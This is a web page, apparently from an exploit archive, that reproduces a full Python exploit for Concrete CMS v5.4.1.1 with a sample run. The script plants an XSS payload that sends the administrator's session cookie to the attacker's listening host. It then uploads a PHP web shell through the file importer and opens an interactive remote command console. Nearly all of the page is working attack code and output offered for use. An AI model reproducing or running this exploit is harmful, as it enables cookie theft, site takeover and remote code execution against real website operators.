ExploitFixes
Concrete CMS v5.4.1.1 XSS/Remote Code Execution Exploit 2011-01-05 15:15:19

#!/usr/bin/python
# Concrete CMS v5.4.1.1 xss/remote code execution exploit
# Download: http://www.concrete5.org/
# Special Zeitgeist pre release - "Moving Forward" - 15th Jan 2011
# "They must find it difficult, those who take authority as the truth instead of truth as the authority"
# http://www.zeitgeistmovie.com/
# PoC usage:
# [[email protected] concrete5]$ ./concrete_smash.py -t 192.168.1.17 -d /webapps/concrete5/ -p 8080 -s suntzu -i wlan0
#
# | --------------------------------------------------- |
# | Concrete CMS v5.4.1.1 Remote Code Execution Exploit |
# | by mr_me - net-ninja.net -------------------------- |
#
# (+) Created XSS in index.html, send the XSS to the admin
# (+) Listening on port 8080 for our target
# (+) Recieved a connection from 192.168.1.2
# (+) Confirmed target @ http://192.168.1.17/webapps/concrete5/index.php/dashboard/scrapbook/
# (+) Got the cookie 2b2rf4s3fnuu72rn2sbqonesp4, checking if we have admin access..
# (+) Admin access is confirmed
# (+) Determining the upload nounce
# (+) Got the file upload nounce, uploading 'suntzu' shell..
# (+) Shell uploaded! Now looking for it
# (!) Shell found at http://192.168.1.17/webapps/concrete5/files/7312/9378/6243/suntzu.php.xla
# (+) Entering interactive remote console (q for quit)
#
# [email protected]# id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
# [email protected]# q
#
# [[email protected] concrete5]$

import socket, sys, urllib2, re, struct, fcntl, getpass
from optparse import OptionParser

usage = "./%prog -t [target] -d [path] -p [port] -s [shell name] -i [interface]"
usage += "\nExample: ./%prog -t 192.168.1.17 -d /webapps/concrete5/ -p 8080 -s suntzu -i wlan0"

parser = OptionParser(usage=usage)
parser.add_option("-t", type="string", action="store", dest="target",
help="Target server as IP or host")
parser.add_option("-d", type="string", action="store", dest="path",
help="Directory path of Concrete CMS of your target")
parser.add_option("-p", type="string",action="store", dest="port",
help="Server port to listen on")
parser.add_option("-s", type="string", action="store", dest="shellName",
help="shell name to write on the target server")
parser.add_option("-i", type="string", action="store", dest="ifce",
help="External network interface, must be routable.")

(options, args) = parser.parse_args()

def banner():
print "\n\t| --------------------------------------------------- |"
print "\t| Concrete CMS v5.4.1.1 Remote Code Execution Exploit |"
print "\t| by mr_me - net-ninja.net -------------------------- |\n"

if len(sys.argv) < 10:
banner()
parser.print_help()
sys.exit(1)

# set the php code injection (just an example here)
phpShell = "<?php system($_GET['cmd']); ?>"
myCmd = "?cmd="

def get_ip_address(ifname):
ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return socket.inet_ntoa(fcntl.ioctl(ls.fileno(), 0x8915, struct.pack('256s', ifname[:15]))[20:24])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", int(options.port)))
s.listen(1)

def sendPostRequest(req):
su = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# change the port to another, if they are running the CMS off another port (443?)
try:
su.connect((options.target,80))
except:
print "(-) Failed making the connection to target %s" % options.target
su.send(req)
data = su.recv(1024)
su.close()
return data

def generateShellUpload(cookie, ccm_token):
postRequest = ("POST %sindex.php/tools/required/files/importers/single HTTP/1.1\r\n"
"Host: %s\r\n"
"Cookie: CONCRETE5=%s;\r\n"
"Content-Type: multipart/form-data; boundary=---------------------------lulz\r\n"
"Content-Length: 313\r\n\n"
"-----------------------------lulz\n"
"Content-Disposition: form-data; name=\"Filedata\"; filename=\"%s.php.xla\"\r\n\n"
"%s\n"
"-----------------------------lulz\n"
"Content-Disposition: form-data; name=\"ccm_token\"\r\n\n"
"%s\n"
"-----------------------------lulz--\r\n\r\n" % (options.path, options.target, cookie, options.shellName, phpShell, ccm_token))

return postRequest

def xssTheAdmin():
print "(+) Created XSS in index.html, send the XSS to the admin"
print "(+) Listening on port %s for our target" % (options.port)
xssJunk = ("<html><body onload='document.f.submit()'>"
"<form method=post name=f action=\"http://%s%sindex.php/dashboard/scrapbook/addScrapbook/\">"
"<input name=\"scrapbookName\" type=\"hidden\" value='<script>document.location=\"http://%s:%s/cookie=\"+document.cookie+\"=\"</script>'>"
"<input type=\"hidden\" value=\"Add\" ></form>"
"</html>" % (options.target, options.path, get_ip_address(options.ifce),options.port))
try:
xssFile = open('index.html','w')
xssFile.write(xssJunk)
xssFile.close()
except:
print "(-) Error writing file.."
sys.exit(1)

def sendPayloads(uri, magicCookie):
try:
req = urllib2.Request(uri)
req.add_header('Cookie', 'CONCRETE5='+magicCookie)
check = urllib2.urlopen(req).read()
except urllib.error.HTTPError, error:
check = error.read()
except urllib.error.URLError:
print "(-) Target connection failed, check your address"
sys.exit(1)
return check

def interactiveAttack(ws):
print "(+) Entering interactive remote console (q for quit)\n"
hn = "%[email protected]%s# " % (getpass.getuser(), options.target)
cmd = ""
while cmd != 'q':
cmd = raw_input(hn)
cmdResponse = sendPayloads(ws+myCmd+cmd,"lolnoauth")
print cmdResponse

def startShellAttack():
conn, addr = s.accept()
print "(+) Recieved a connection from %s" % addr[0]
while 1:
try:
data = conn.recv(1024)
cookie = data.split("CONCRETE5=")[1].split("=")[0].rstrip()
target = data.split("Referer: ")[1].rstrip()

confirmTarget = "http://"+options.target+options.path+"index.php/dashboard/scrapbook/"
if target == confirmTarget:
print "(+) Confirmed target @ %s" % (target)
else:
print "(-) Error, mismatch of targets."
sys.exit(1)
print "(+) Got the cookie %s, checking if we have admin access.." % (cookie)
adminCheck = sendPayloads(target, cookie)
if re.search('delete this scrapbook', adminCheck):
print "(+) Admin access is confirmed"
else:
print "(-) This is not an admin cookie. Exiting.."
sys.exit(1)

print "(+) Determining the upload nounce"
nounceRequest = "http://"+options.target+options.path+"index.php/dashboard/files/search/"
nounceResponse = sendPayloads(nounceRequest, cookie)
ccm_token = nounceResponse.split("<input type=\"hidden\" name=\"ccm_token\" value=\"")[1].split("\" />")[0]
print ("(+) Got the file upload nounce, uploading '%s' shell.." % (options.shellName))
uploadReq = generateShellUpload(cookie, ccm_token)
findShell = sendPostRequest(uploadReq)
print "(+) Shell uploaded! Now looking for it"
magicNum = re.search('(?<=push\()\w+', findShell)
shellSearchReq = ("http://%s%sindex.php/tools/required/files/properties?fID=%s"
% (options.target, options.path, magicNum.group(0)))
shellSearch = sendPayloads(shellSearchReq, cookie)
shellLoc = shellSearch.split("<th>URL to File</th>")[1].split("</td>")[0].split("=\"2\">")[1]
print ("(!) Shell found at %s" % (shellLoc))
break
except:
break
conn.close()
return shellLoc

if __name__ == "__main__":
banner()
xssTheAdmin()
webShell = startShellAttack()
interactiveAttack(webShell)

<!-- Dynamic page generated in 0.195 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2011-01-06 14:15:21 -->